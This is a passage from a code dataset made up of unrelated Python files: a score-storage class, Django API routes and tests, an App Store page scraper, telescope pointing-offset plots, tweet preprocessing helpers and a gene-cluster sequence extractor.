store_merged_performance(self, performance_object, is_stable):\n \"\"\"\n @type performance_object: L{MergerPerformance}\n \"\"\"\n output_path = self.__get_base_merged_performance_path(performance_object.metadata, is_stable)\n self.__io_handler.save_raw_data(performance_object.df.to_csv(encoding='utf-8'), output_path)\n\n def load_merged_performance(self, metadata):\n \"\"\"\n @type metadata: L{MergedPerformanceMetadata}\n \"\"\"\n input_path = self.__get_base_merged_performance_path(metadata, is_stable=False)\n performance_df = pd.read_csv(StringIO(self.__io_handler.load_raw_data(input_path)), index_col=0)\n return MergerPerformance(performance_df, metadata)\n\n def store_merger_model(self, merger_model):\n \"\"\"\n @type merger_model: L{MergerModel}\n \"\"\"\n path = self.__get_base_merged_model_path(merger_model.metadata)\n local_temp_path = tempfile.mkdtemp()\n joblib.dump(merger_model.model, os.path.join(local_temp_path, 'model.pkl'))\n for f in os.listdir(local_temp_path):\n with open(os.path.join(local_temp_path, f), 'rb') as binary_file:\n path = os.path.join(path, f)\n self.__io_handler.save_raw_data(binary_file.read(), path)\n shutil.rmtree(local_temp_path)\n\n @staticmethod\n def __get_base_mergers_path(customer, quest_id, query_id):\n path = os.path.join('sandbox-{}'.format(customer), 'Quests', quest_id, query_id, 'mergers')\n return path\n\n @staticmethod\n def 
__get_base_merged_performance_path(metadata, is_stable):\n \"\"\"\n @type metadata: L{MergedPerformanceMetadata}\n @rtype: C{str}\n \"\"\"\n merged_scores_metadata = metadata.merged_scores_metadata\n path = os.path.join('sandbox-{}'.format(merged_scores_metadata.customer), 'Quests',\n merged_scores_metadata.quest_id, merged_scores_metadata.query_id,\n 'mergers' if not is_stable else 'stable_mergers',\n merged_scores_metadata.merger_metadata.merger_id,\n 'artifacts', 'results_summary', '{}.csv'.format(metadata.performance_type))\n return path\n\n @staticmethod\n def __get_base_merged_scores_path(metadata):\n \"\"\"\n @type metadata: L{MergedScoresMetadata}\n @rtype: C{str}\n \"\"\"\n path = os.path.join('sandbox-{}'.format(metadata.customer), 'Quests', metadata.quest_id,\n metadata.query_id, 'mergers', metadata.merger_metadata.merger_id, 'scores')\n return path\n\n @staticmethod\n def __get_base_merged_model_path(metadata):\n \"\"\"\n @type metadata: L{MergedScoresMetadata}\n \"\"\"\n output_path_join = os.path.join('sandbox-{}'.format(metadata.customer), 'Quests',\n metadata.quest_id, metadata.query_id,\n 'mergers', metadata.merger_metadata.merger_id,\n 'artifacts', 'models')\n return output_path_join\n\n @staticmethod\n def __get_merger_metadata_path(metadata):\n \"\"\"\n @type metadata: L{MergedScoresMetadata}\n @rtype: C{str}\n \"\"\"\n output_path_join = os.path.join('sandbox-{}'.format(metadata.customer), 'Quests', metadata.quest_id,\n metadata.query_id, 'mergers', metadata.merger_metadata.merger_id,\n 'metadata.json')\n\n return output_path_join\n\n @staticmethod\n def __get_df_as_text(df):\n \"\"\"\n @type df: C{DataFrame}\n @rtype: C{str}\n \"\"\"\n scores_arr = np.c_[df.index, df.values]\n num_scorers = len(df.columns)\n save_format = \",\".join([\"%15.0f\"] + [\"%.25f\"] * num_scorers)\n header = \",\".join([\"idnum\"] + list(df.columns.values))\n all_scores_data = StringIO()\n np.savetxt(all_scores_data, scores_arr, fmt=save_format, header=header, comments=\"\")\n return all_scores_data.getvalue()\n\n def load_all_merger_ids(self, customer, quest_id, query_id):\n \"\"\"\n @type customer: C{str}\n @type quest_id: C{str}\n @type query_id: C{str}\n @return: The list of all merger ids\n @rtype: C{List}\n \"\"\"\n mergers_path = self.__get_base_mergers_path(customer, quest_id, query_id)\n all_merger_paths = list(self.__io_handler.list_dir(mergers_path))\n # merger_ids = [os.path.basename(os.path.split(os.path.split(full_name)[0])[0]) for full_name in all_merger_paths\n # if \"merged_scores.csv\" in full_name]\n merger_ids = [os.path.basename(full_name) for full_name in all_merger_paths]\n return merger_ids\n\n","sub_path":"source/storage/stores/merged_scores_store/csv_store.py","file_name":"csv_store.py","file_ext":"py","file_size_in_byte":7793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"109479720","text":"from django.conf.urls import url, include\nfrom rest_framework import routers\nfrom api import views\n\nurlpatterns = [\n url(r'^user/$', views.user_list), # GET, POST\n url(r'^user/(?P[0-9]+)/$', views.user_detail), # GET, PUT, DELETE\n\n url(r'^company/$', views.company_list), # GET, POST\n url(r'^company/(?P[0-9]+)/$', views.company_detail), # GET, PUT, DELETE\n\t\n\turl(r'^insurer/$', views.insurer_list), # GET, POST\n url(r'^insurer/(?P[0-9]+)/$', views.insurer_detail), # GET, PUT, DELETE\n url(r'^insurer/(?P[0-9]+)/formulary/$', views.formulary_list), # GET, POST\n\n\turl(r'^pharma/$', views.pharma_list), # GET, 
POST\n url(r'^pharma/(?P[0-9]+)/$', views.pharma_detail), # GET, PUT, DELETE\n url(r'^pharma/(?P[0-9]+)/drug/$', views.drug_list), # GET, POST\n\n url(r'^drug/$', views.all_drugs_list), # GET, POST\n url(r'^drug/(?P[0-9]+)/$', views.all_drugs_detail), # GET, PUT, DELETE\n\n url(r'^formulary/$', views.all_formularies_list), # GET, POST\n url(r'^formulary/(?P[0-9]+)/$', views.all_formularies_detail), # GET, PUT, DELETE\n\n url(r'^formulary/(?P[0-9]+)/entry/$', views.post_formulary_entry), # POST\n url(r'^formulary/(?P[0-9]+)/entry/(?P[0-9]+)/$', views.formulary_entry_detail), # GET, PUT, DELETE\n\n url(r'^formulary/(?P[0-9]+)/tier/$', views.tier_list), # GET, POST\n url(r'^formulary/(?P[0-9]+)/tier/(?P[0-9]+)/$', views.tier_detail), # PUT, DELETE\n\n # These are endpoints for bulk POST/PUT, as discussed SGM 03/13/2018\n url(r'^formulary/(?P[0-9]+)/tiers/$', views.bulk_tier_actions), # POST, PUT\n url(r'^formulary/(?P[0-9]+)/entries/$', views.bulk_formulary_entry_actions), # POST, PUT\n\n # # Orders endpoint for pharma\n # url(r'^pharma/(?P[0-9]+)/order/$', views.order_list),\n]","sub_path":"Legacy/Backend/torque_backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"202498773","text":"#!/usr/bin/python3\nimport os, sys, re\nimport socket\nimport random\n\nfrom state import SharedState\nfrom testutil import *\nimport urlutil\nimport util\nimport myparser\nimport config\nimport pickle\n\n# used as the data folder name\ntask_name = \"AppleDownload\"\nnewstart = True\ntask_folder = os.path.join(config.here, 'data', task_name)\ntask_statepath = os.path.join(task_folder, 'state.pickle')\nallurls_filepath = os.path.join(task_folder, 'ios_appurls.pickle')\n\ndef url_to_id(url):\n \"\"\" eg https://itunes.apple.com/us/app/bugs-wars/id406313428 \"\"\"\n url = url[32:]\n end = url.rfind('?')\n if end != -1:\n url = url[:end]\n return url\n\ndef id_to_url(id):\n return \"https://itunes.apple.com/us/app/%s?mt=8\" % id\n\ndef init():\n \"\"\"\n Gloabl Initialization routine for task\n \"\"\"\n\n \"\"\" Create SharedState and give it runf \"\"\"\n state = SharedState(task_name)\n state.runf = runf\n state.taskfolder = task_folder\n state.statepath = task_statepath\n\n all_urlset = set(util.Pickler(allurls_filepath).load())\n oldres = util.aggregate_res(task_folder, trans = lambda a : a['url'])\n old_urlset = set(oldres)\n\n initial_idset = all_urlset.difference(old_urlset)\n\n print('# of urls %d ' % len(initial_idset))\n\n \"\"\" Necessary step, initialize the task queue \"\"\"\n for job in initial_idset:\n state.queue.put(job)\n\n return state\n\ndef runf(self, job, debug=False):\n \"\"\"\n job is given, task_done will be called, but still need to handle various locks\n \"\"\"\n with self.state.master_lock:\n pass\n\n try:\n page = urlutil.getpage_unicode(job)\n res = myparser.parse_appstore_apppage(page)\n res['id'] = url_to_id(job)\n self.state.resultlist.append(res)\n\n except config.IDError as e:\n print(str(e))\n add_to_faillist(job)\n\n except IndexError as e:\n yellowprint('index error happends (app no dev?), url is %s' % job)\n add_to_faillist(job)\n self.state.faillist.append(job)\n\ndef main():\n import downloader\n downloader.start(init)\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"task_download_appleappstore.py","file_name":"task_download_appleappstore.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"332858210","text":"from __future__ import unicode_literals\nfrom django.db import models \nfrom apirest.utils.constants import Constants\n\nclass ExpedienteOriginaDespacho(models.Model):\n id = models.AutoField(primary_key=True,db_column='expediente_origina_despacho_id')\n fk_expediente = models.ForeignKey('Proyecto', db_column='fk_expediente')\n fk_despacho = models.ForeignKey('Despacho', db_column='fk_despacho')\n orden = models.SmallIntegerField(blank=True, null=True)\n solo_vista = models.CharField(max_length=1, blank=True,db_column='bsolovista')\n \n class Meta:\n managed = False\n db_table = Constants().EXPEDIENTE_ORIGINA_DESPACHO\n app_label = Constants().APIREST","sub_path":"ServiciosParlamentarios/apirest/models/expedientes/expediente_origina_despacho.py","file_name":"expediente_origina_despacho.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"507955057","text":"#!/common/anaconda3/bin/python\n\nimport os,fnmatch,sys,glob,re\nfrom datetime import datetime\nfrom io import StringIO\nfrom bokeh.plotting import figure, show, output_file\nfrom bokeh.layouts import gridplot\nfrom bokeh.models import ColumnDataSource,ColorBar\nfrom bokeh.palettes import viridis\nfrom bokeh.transform import linear_cmap\nfrom bokeh.io import save\nimport numpy as np\nimport math as m\nimport sys\nimport time\nimport pandas as pd\n\nantenna = sys.argv[1]\nreceiver = sys.argv[2]\nmodelUpdateDate = datetime.strptime(sys.argv[3],'%d %b %Y')\n# last model update date in format e.g.: 18 Jul 2018\n\n# for saving a pdata file for fitting etc.\nsavePdata = int(sys.argv[4])\n\ntoday = time.strftime(\"%d%b%Y\")\n\nif int(receiver) == 230:\n receiverCode = \"A1\"\n Rx = \"RxA\"\nif int(receiver) == 345:\n receiverCode = \"B1\"\n Rx = \"RxA\"\nif int(receiver) == 240:\n receiverCode = \"E\"\n Rx = \"RxB\"\nif int(receiver) == 400:\n receiverCode = \"C\"\n Rx = \"RxB\"\n\nplottitle = \"Antenna-\"+antenna + \" \" + \" \" + receiver + \" GHz \" + today\n\noutputHTMLfileName = \"ant\"+antenna+\"_\"+receiver+\"_\"+today+\".html\"\npdataFile = \"pdata_\"+antenna+\"_\"+receiver+\"_\"+today+\".txt\"\n\nipointDirectory = \"/sma/rtdata/engineering/ipoint/ant\"+antenna+\"/\"\n\n\nlistOfFiles = os.listdir(ipointDirectory)\n#for entry in listOfFiles:\n# if fnmatch.fnmatch(entry,pattern):\n# print(entry)\nfiles_path = os.path.join(ipointDirectory,\"??????\")\nfiles = sorted(glob.iglob(files_path),key=os.path.getctime,reverse=True)\nfilesToCat = []\nfor file in files:\n print(file)\n t = os.path.getctime(file)\n fileDate = datetime.fromtimestamp(t)\n filesToCat.append(file)\n if (fileDate <= modelUpdateDate):\n break\n#concat = ''.join([open(f).read() for f in files])\n#print(concat)\noutput = StringIO()\nfor f in filesToCat:\n with open(f,encoding='latin-1') as infile:\n line = infile.read()\n output.write(line+'\\n')\nconcatenatedFileContent = output.getvalue()\noutput.close()\n\nno=[]\nsourcename=[]\naz=[]\nel=[]\nazoff=[]\neloff=[]\nazofferr=[]\nelofferr=[]\nutc=[]\ntimestamp=[]\n\nif (savePdata==1):\n pF = open(pdataFile,'w')\nsNo=1\nfor line in StringIO(concatenatedFileContent):\n if Rx in line:\n if receiverCode in line:\n columns = line.split(',')\n try:\n sourcename.append(columns[3])\n 
az.append(float(columns[40]))\n el.append(float(columns[41]))\n azoff.append(float(columns[119]))\n eloff.append(float(columns[121]))\n azofferr.append(float(columns[120]))\n elofferr.append(float(columns[122]))\n utc.append(float(columns[16]))\n timestamp.append(columns[108])\n no.append(sNo)\n pLine = ('%d %s %f %f %f %f %f %f %f %s\\n') % \\\n (sNo,columns[3],float(columns[40]),float(columns[41]),\\\n float(columns[119]),float(columns[121]),float(columns[120]),\\\n float(columns[122]),float(columns[16]),columns[108])\n if (savePdata==1):\n pF.write(pLine)\n except ValueError:\n continue\n sNo = sNo+1\n\nif (savePdata==1):\n pF.close()\n\n\n#dayVsNight = ['#0000cc','#0000cc','#0000cc','#0000cc',\n#'#0066ff','#6666ff','#6600ff','#9727bc','#ff8000','#ff5050','#ff0000','#ff0000']\n\ndayVsNight = ['#0000cc','#0000cc','#0000cc','#0000cc','#0000cc','#6666ff','#6600ff','#ff0000','#ff0000','#ff0000','#ff0000','#ff0000']\n\ndaylightH = []\nfor hour in utc:\n hour = hour-10.\n if (hour < 0.):\n hour = hour + 24.\n if (hour >= 12.):\n daylightH.append(24.-hour)\n else:\n daylightH.append(hour)\n\nerr_el=[]\nerr_az=[]\nerr_azofferr=[]\nerr_elofferr=[]\nfor x,y,yerr in zip(el,azoff,azofferr):\n err_el.append((x,x))\n err_azofferr.append((y-yerr,y+yerr))\nfor x,y,yerr in zip(az,azoff,azofferr):\n err_az.append((x,x))\nfor x,y,yerr in zip(el,eloff,elofferr):\n err_elofferr.append((y-yerr,y+yerr))\n\nmapper = linear_cmap(field_name='daylightH',palette=dayVsNight,low=0.0,high=12.0)\n\nTimestamp = []\nfor timeStamp in timestamp:\n# ts = pd.to_datetime(timeStamp.decode('UTF-8'), format='%d%b%y_%H%M%S') \n ts = pd.to_datetime(timeStamp, format='%d%b%y_%H%M%S') \n Timestamp.append(ts)\n\nsname = []\nfor s in sourcename:\n# sname.append(s.decode('UTF-8'))\n sname.append(s)\n\ntstamp = []\nfor t in timestamp:\n# tstamp.append(t.decode('UTF-8'))\n tstamp.append(t)\n\n\noutput_file(outputHTMLfileName)\n\nsource = ColumnDataSource(data=dict(az=az,el=el,azoff=azoff,eloff=eloff,azofferr=azofferr,elofferr=elofferr,Timestamp=Timestamp,err_az=err_az,err_el=err_el,err_azofferr=err_azofferr,err_elofferr=err_elofferr,utc=utc,daylightH=daylightH,tstamp=tstamp,sname=sname))\n\nTOOLS = \"tap,reset,save,crosshair,wheel_zoom,box_zoom,box_select,lasso_select\"\nTOOLTIPS = [(\"index\",\"$index\"),(\"sname\",\"@sname\"),(\"tstamp\",\"@tstamp\")]\np1 = figure(title=plottitle, width=400, height=220,x_range=(0,90),tools=TOOLS,tooltips=TOOLTIPS)\np1.yaxis.axis_label='Azimuth offsets (\")'\np1.xaxis.axis_label = 'Elevation (deg)'\np1.circle(x='el',y='azoff',color=mapper,size=7,fill_alpha=1,line_alpha=0,source=source)\np1.circle(x='el',y='azoff',color=mapper,size=7,fill_alpha=1,line_alpha=0,source=source)\np1.square(x=el[-1],y=azoff[-1],fill_color=None,size=12,line_color=\"red\")\np1.multi_line(xs='err_el',ys='err_azofferr',color='black',source=source)\n\np2 = figure(title='',width=400, height=220,x_range=(-180,360),tools=TOOLS,tooltips=TOOLTIPS)\np2.yaxis.axis_label='Azimuth offsets (\")'\np2.xaxis.axis_label = 'Azimuth (deg)'\np2.circle(x='az',y='azoff',color=mapper,size=7,fill_alpha=1,line_alpha=0,source=source)\np2.square(x=az[-1],y=azoff[-1],fill_color=None,size=12,line_color=\"red\")\np2.multi_line(xs='err_az',ys='err_azofferr',color='black',source=source)\n\np3 = figure(title='',width=400, height=220,x_range=(0,90),tools=TOOLS,tooltips=TOOLTIPS)\np3.yaxis.axis_label='Elevation offsets (\")'\np3.xaxis.axis_label = 'Elevation 
(deg)'\np3.circle(x='el',y='eloff',color=mapper,fill_alpha=1,size=7,line_alpha=0,source=source)\np3.square(x=el[-1],y=eloff[-1],fill_color=None,size=12,line_color=\"red\")\np3.multi_line(xs='err_el',ys='err_elofferr',color='black',source=source)\n\np4 = figure(title='',width=400, height=220,x_range=(-180,360),tools=TOOLS,tooltips=TOOLTIPS)\np4.yaxis.axis_label='Elevation offsets (\")'\np4.xaxis.axis_label = 'Azimuth (deg)'\np4.circle(x='az',y='eloff',color=mapper,fill_alpha=1,size=7,line_alpha=0,source=source)\np4.square(x=az[-1],y=eloff[-1],fill_color=None,size=12,line_color=\"red\")\np4.multi_line(xs='err_az',ys='err_elofferr',color='black',source=source)\n\np5 = figure(title='',width=400, height=220,x_range=(-180,360),tools=TOOLS,tooltips=TOOLTIPS)\np5.yaxis.axis_label='Elevation (deg)'\np5.xaxis.axis_label = 'Azimuth (deg)'\np5.circle(x='az',y='el',color=mapper,fill_alpha=1,size=7,line_alpha=0,source=source)\np5.square(x=az[-1],y=el[-1],fill_color=None,size=12,line_color=\"red\")\n\np6 = figure(title='',width=220, height=220,x_range=(-30,30),y_range=(-30,30),tools=TOOLS,tooltips=TOOLTIPS)\np6.yaxis.axis_label='Eloff (\")'\np6.xaxis.axis_label = 'Azoff (\")'\np6.circle(x='azoff',y='eloff',color=mapper,fill_alpha=1,size=7,line_alpha=0,source=source)\np6.square(x=azoff[-1],y=eloff[-1],fill_color=None,size=12,line_color=\"red\")\n\np7 = figure(x_axis_type='datetime',title='',width=400, height=220,tools=TOOLS,tooltips=TOOLTIPS)\np7.yaxis.axis_label='Azimuth offsets (\")'\np7.xaxis.axis_label = 'Time'\np7.circle(x='Timestamp',y='azoff',color=mapper,fill_alpha=1,size=7,line_alpha=0,source=source)\np7.square(x=Timestamp[-1],y=azoff[-1],fill_color=None,size=12,line_color=\"red\")\n\np8 = figure(x_axis_type='datetime',title='',width=400, height=220,tools=TOOLS,tooltips=TOOLTIPS)\np8.yaxis.axis_label='Elevation offsets (\")'\np8.xaxis.axis_label = 'Time'\np8.circle(x='Timestamp',y='eloff',color=mapper,fill_alpha=1,size=7,line_alpha=0,source=source)\np8.square(x=Timestamp[-1],y=eloff[-1],fill_color=None,size=12,line_color=\"red\")\n#color_bar = ColorBar(color_mapper=mapper['transform'],width=8,)\n#p8.add_layout(color_bar,'right')\n\n\ngrid = gridplot([[p1,p2],[p3,p4],[p5,p6],[p7,p8]],tools=TOOLS,tooltips=TOOLTIPS,toolbar_location=\"below\",merge_tools=True)\n\n#show(grid)\nsave(grid,filename=outputHTMLfileName)\n","sub_path":"offline/Linux/common/pointingModelAnalysis/python/ipointPlot.py","file_name":"ipointPlot.py","file_ext":"py","file_size_in_byte":8286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"625460340","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport nltk\nimport string\nimport sys\nimport unicodedata\n\npreprocessing = [\n (r'http://[^\\s]+', r' -URL- '),\n (r':-?\\)', r' -SMI- '),\n (r':-?\\(', r' -FRN- '),\n (r'\\((\\w)', r' ( \\1'),\n (r'\\)(\\w)', r' ) \\1'),\n (r'\\)\\.', r' ) .'),\n (r'( |^)\\$(\\d+)( |$)', r' $ \\2 '),\n (r'\\.\\.+', r' -DOTS- '),\n (r'@\\w+', r' -USER- '),\n (r'( |^)[%s]+\\w+( |$)' % string.punctuation, r' -EMO- '),\n (r'( |^)h[ha]+( |$)', r' -HA- '),\n (r'( |^)l[lo]+( |$)', r' -LOL- '),\n (r'(( |^)\\w+)\\.', r'\\1 .'),\n #(r'#(\\w+)', r' \\1 '),\n (r'!+', r' -EXCLAM- '),\n (r'\\?+', r' -QUESTION- '),\n (r'( |^)(1$|$1)[$1]*( |$)', r' -1D- '),\n (r'[%s]{2,}' % string.punctuation, r' -PSEQ- '),\n (r'\\|+', r' -BAR- '),\n (r'\\s+', r' '), #Strip extra whitespace\n (r'^\\s+', r''), #Strip leading whitespace\n (r'\\s+$', r''), #Strip trailing whitespace\n (r'[0-9]+', r' -NUM- ') #Normalize numbers (NOTE: 
this is new, just testing out\n ]\n\ndef stripUsers(string):\n words = string.split(' ')\n return ' '.join([word for word in words if(len(word) > 0 and word[0] != '@')])\n\ndef stripContractions(words):\n return [word for word in words if(len(word) > 0 and word[0] != \"'\")]\n\ndef preprocess(string):\n for p in preprocessing:\n string = re.sub(p[0], p[1], string)\n return string\n\ncontrol_chars = ''.join(map(unichr, range(0,32) + range(127,160)))\ncontrol_char_re = re.compile('[%s]' % re.escape(control_chars))\n\ndef removeControlChars(s):\n return control_char_re.sub('', s)\n\ndef isAscii(string):\n try:\n string.decode('ascii')\n except UnicodeEncodeError:\n return False\n except UnicodeDecodeError:\n return False\n else:\n return True\n\ndef containsKana(string):\n for c in string:\n if ord(c) >= 0x3040 and ord(c) <= 0x309f:\n return True\n elif ord(c) >= 0x30A0 and ord(c) <= 0x30FF:\n return True\n return False\n\ndef isAscii_old(string):\n for i in range(len(string)):\n o = ord(string[i])\n if o > 127:\n return False\n return True\n\nZH = set([u'是', u'不', u'我', u'有', u'这', u'个', u'说', u'们', u'为', u'你', u'时', u'那', u'去', u'过', u'对', u'她', u'后', u'么'])\n\nEN = set(['it', 'he', 'she', 'going', 'day', 'tonight', 'with', 'just', 'want', 'make', 'the', 'you', 'about'])\n\nstop_list = {}\n#for line in open('stop_list'):\n# line = line.rstrip('\\n')\n# stop_list[line] = 1\nstop_list['.'] = 1\nstop_list['\"'] = 1\nstop_list[\"'\"] = 1\nstop_list[','] = 1\nstop_list[\"n't\"] = 1\nstop_list[\"-\"] = 1\nstop_list[\"(\"] = 1\nstop_list[\")\"] = 1\nstop_list[\"#\"] = 1\nstop_list[\"&\"] = 1\nstop_list[\"!\"] = 1\n\ndef filterStop(words):\n return [word for word in words if(not stop_list.has_key(word.lower()))]\n\ndef isEnglish(string):\n if not isAscii(string):\n return False\n else:\n words = nltk.word_tokenize(string)\n for word in words:\n if word in EN:\n return True\n return False\n\ndef isChinese(string):\n for c in ZH:\n if c in string and not containsKana(string):\n return True\n return False\n\ndef IncHash2(hashtable, k1, k2, ammnt=1.0):\n if not hashtable.has_key(k1):\n hashtable[k1] = {}\n if not hashtable[k1].has_key(k2):\n hashtable[k1][k2] = 0.0\n hashtable[k1][k2] += ammnt\n\ndef IncHash(hashtable, k1, ammnt=1.0):\n if not hashtable.has_key(k1):\n hashtable[k1] = 0.0\n hashtable[k1] += ammnt\n\ndef GetHashCnt(hashtable, k1):\n if not hashtable.has_key(k1):\n return 0.0\n else:\n return hashtable[k1]\n\ndef WordDict2Wordle(wordDict, outFile):\n out = open(outFile, 'w')\n sortedWords = wordDict.keys()\n sortedWords.sort(lambda a,b: cmp(wordDict[b], wordDict[a]))\n for word in sortedWords:\n out.write(\"%s:%f\\n\" % (word, wordDict[word]))\n\n","sub_path":"TwitterUtils.py","file_name":"TwitterUtils.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"382274249","text":"\"\"\"Extract sequences from session files\n\nTODO: Download hit cluster genomic regions from NCBI\n\"\"\"\n\n\nimport logging\nimport re\n\n\nfrom cblaster.classes import Session\nfrom cblaster.helpers import efetch_sequences\n\n\nLOG = logging.getLogger(__name__)\n\n\ndef parse_organisms(organisms):\n \"\"\"Parses specified organisms and creates RegEx patterns.\"\"\"\n return [\n re.compile(organism)\n for organism in organisms\n ]\n\n\ndef organism_matches(organism, patterns):\n \"\"\"Tests organism filter RegEx patterns against a given organism name.\"\"\"\n for pattern in patterns:\n if pattern.match(organism):\n return 
True\n return False\n\n\ndef parse_scaffolds(scaffolds):\n \"\"\"Parses scaffold names and ranges\n\n e.g.\n scaf_123 --> {\"name\": \"scaf_123\"}\n scaf_123:520-62000 --> {\"name\": \"scaf_123\", \"start\": 520, \"end\": 62000}\n \"\"\"\n records = {}\n for scaffold in scaffolds:\n name, *parts = scaffold.split(\":\")\n start = None\n end = None\n if parts:\n try:\n start, end = [int(p) for p in parts.split(\"-\")]\n except ValueError:\n LOG.exception(\"Expected range in format start-end\")\n records[name] = dict(start=start, end=name)\n return records\n\n\ndef out_of_bounds(subject, start, end):\n \"\"\"Tests if a subject overlaps with or is outside of a given range.\"\"\"\n return (\n subject.end < start\n or subject.start < start < subject.end\n or subject.start < end < subject.end\n or subject.start > end\n )\n\n\ndef flatten(array):\n \"\"\"Flattens a list of lists.\n e.g. [[1, 2, 3], [4, 5, 6]] --> [1, 2, 3, 4, 5, 6]\n \"\"\"\n flat = []\n for element in array:\n flat.extend(element)\n return flat\n\n\ndef record_to_fasta(record, delimiter=None, name_only=False):\n \"\"\"Formats a given record as FASTA.\"\"\"\n return \">{}\\n{}\".format(\n record_to_header(record, delimiter=delimiter, name_only=name_only),\n record.get(\"sequence\")\n )\n\n\ndef record_to_header(record, delimiter=None, name_only=False):\n \"\"\"Builds a header for a given record.\"\"\"\n if name_only:\n return record[\"name\"]\n fields = [\"name\", \"organism\", \"scaffold\", \"start\", \"end\"]\n values = [str(record[field]) for field in fields]\n if delimiter:\n return delimiter.join(values)\n return \"{} [organism={}] [scaffold={}:{}-{}]\".format(*values)\n\n\ndef format_records(records, delimiter=None, to_fasta=False, name_only=False):\n \"\"\"Formats records \"\"\"\n func = record_to_fasta if to_fasta else record_to_header\n return \"\\n\".join(\n func(record, delimiter=delimiter, name_only=name_only)\n for record in records\n )\n\n\ndef extract_records(\n session,\n in_cluster=True,\n queries=None,\n organisms=None,\n scaffolds=None,\n):\n \"\"\"Extracts subject sequence names from a session file.\"\"\"\n if organisms:\n organisms = parse_organisms(organisms)\n if scaffolds:\n scaffolds = parse_scaffolds(scaffolds)\n records = []\n for organism in session.organisms:\n if organisms and not organism_matches(organism.name, organisms):\n continue\n for accession, scaffold in organism.scaffolds.items():\n if scaffolds:\n if accession not in scaffolds:\n continue\n record = scaffolds[accession]\n start = record.get(\"start\")\n end = record.get(\"end\")\n else:\n start = None\n end = None\n if in_cluster:\n subjects = flatten(cluster for cluster in scaffold.clusters)\n else:\n subjects = scaffold.subjects\n for subject in subjects:\n if (start and end) and out_of_bounds(subject, start, end):\n continue\n if queries and not any(h.query in queries for h in subject.hits):\n continue\n record = dict(\n name=subject.name,\n organism=organism.name,\n scaffold=scaffold.accession,\n start=subject.start,\n end=subject.end,\n )\n records.append(record)\n return records\n\n\ndef extract(\n session,\n in_cluster=True,\n delimiter=None,\n name_only=False,\n download=False,\n output=None,\n queries=None,\n organisms=None,\n scaffolds=None,\n):\n \"\"\"Extract subject sequences from a cblaster session.\n\n Parameters:\n session (Session): cblaster Session object\n in_cluster: (bool): Only sequences in clusters are extracted\n download (bool): Download hit sequences from NCBI\n output (str): Output file name\n queries (list): 
Query sequence names\n organisms (list): Organism filtering regular expressions\n scaffolds (list): Scaffold names and ranges\n delimiter (str): Sequence description delimiter character\n name_only (bool): Do not save sequence descriptions\n \"\"\"\n LOG.info(\"Starting cblaster extraction\")\n LOG.info(\"Loading session from: %s\", session)\n with open(session) as fp:\n session = Session.from_json(fp)\n\n LOG.info(\"Extracting subject sequences matching filters\")\n records = extract_records(\n session,\n in_cluster=in_cluster,\n queries=queries,\n organisms=organisms,\n scaffolds=scaffolds,\n )\n\n if download:\n LOG.info(\"Fetching %i sequences from NCBI\", len(records))\n headers = [record.get(\"name\") for record in records]\n sequences = efetch_sequences(headers)\n for record in records:\n record[\"sequence\"] = sequences.get(record[\"name\"])\n\n # FASTA format if downloading from NCBI, otherwise newline separated IDs\n text = format_records(\n records,\n delimiter=delimiter,\n to_fasta=download,\n name_only=name_only,\n )\n\n if output:\n with open(output, \"w\") as fp:\n LOG.info(\"Writing output to %s\", fp.name)\n fp.write(text)\n else:\n print(text)\n\n LOG.info(\"Done!\")\n return records\n","sub_path":"cblaster/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":6137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"76321051","text":"# -*- coding: utf-8 -*-\nfrom django.test import TestCase\nfrom apps.hello.models import Bio\nfrom django.core.urlresolvers import reverse\n\n\nclass TestView(TestCase):\n def setUp(self):\n \"\"\"creating user\"\"\"\n Bio.objects.all().delete()\n person = Bio(\n name='Andrew', last_name='Minikh',\n date_of_birth='1998-04-10', bio='Student, junior python developer',\n email='falkesmoon@gmail.com', jabber='falkesmoon@42cc.co',\n skype='falkesmoon', other_contacts='vk.com/falkesmoon')\n person.save()\n self.url = reverse('home')\n\n def test_main_page(self):\n \"\"\" test view to render correct template and return code 200\"\"\"\n response = self.client.get(self.url)\n self.assertTemplateUsed(response, 'main.html')\n self.assertEqual(response.status_code, 200)\n\n def test_render_page(self):\n \"\"\" test view rendering correct data if db have 3 entries\"\"\"\n Bio.objects.create(name=\"qwerty\", last_name=\"qwerty\")\n Bio.objects.create(name=\"zxcv\", last_name=\"zxcv\")\n first_user = Bio.objects.first()\n response = self.client.get(self.url)\n self.assertEqual(response.context['aboutme'], first_user)\n self.assertIn('Andrew', response.content)\n self.assertIn('Minikh', response.content)\n self.assertIn('April 10, 1998', response.content)\n self.assertIn('Student, junior python developer', response.content)\n self.assertIn('falkesmoon@gmail.com', response.content)\n self.assertIn('falkesmoon@42cc.co', response.content)\n self.assertIn('falkesmoon', response.content)\n self.assertIn('vk.com/falkesmoon', response.content)\n\n def test_do_db_entries(self):\n \"\"\" test view to show message if no db entries exist\"\"\"\n Bio.objects.all().delete()\n response = self.client.get(self.url)\n self.assertIn('No active user is found.', response.content)\n\n def test_cyrillic_db(self):\n \"\"\" test view if db have cyrillic symbols \"\"\"\n Bio.objects.all().delete()\n Bio.objects.create(\n name='Андрій', last_name='Мініх',\n bio='Студент, розробник')\n first_user = Bio.objects.first()\n response = self.client.get(self.url)\n self.assertEqual(response.context['aboutme'], 
